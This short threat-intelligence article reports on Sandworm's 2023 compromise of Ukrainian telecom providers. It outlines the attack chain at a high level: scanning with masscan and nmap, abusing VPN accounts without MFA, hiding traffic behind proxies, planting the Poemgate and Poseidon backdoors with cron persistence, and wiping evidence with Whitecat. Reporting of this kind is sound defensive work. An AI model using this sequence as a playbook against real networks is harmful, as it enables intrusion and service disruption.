Behind the Breach: Sandworm’s Exploitation of Ukrainian Telecom Vulnerabilities
The state-sponsored Russian hacking group Sandworm compromised 11 Ukrainian telecommunication providers between May and September 2023. The Ukrainian Computer Emergency Response Team (CERT-UA) reported these breaches, noting service interruptions and potential data breaches caused by the hackers.
Sandworm, linked to Russia’s GRU (armed forces), utilized tactics such as phishing, Android malware, and data-wipers throughout 2023. The attack began with network reconnaissance using the ‘masscan’ tool. Sandworm targeted open ports and unprotected RDP or SSH interfaces. Other tools like ‘ffuf’, ‘dirbuster’, ‘gowitness’, and ‘nmap’ were used to identify web service vulnerabilities. The hackers exploited VPN accounts without multi-factor authentication and used proxy servers like ‘Dante’ and ‘socks5’ to conceal their activities.
Two backdoors, ‘Poemgate’ and ‘Poseidon’, were identified in the breached systems. While ‘Poemgate’ captures admin credentials, ‘Poseidon’ offers extensive remote-control capabilities and maintains its presence by modifying Cron.
Sandworm employed the ‘Whitecat’ tool to remove evidence and deployed scripts to disrupt services, especially targeting Mikrotik equipment.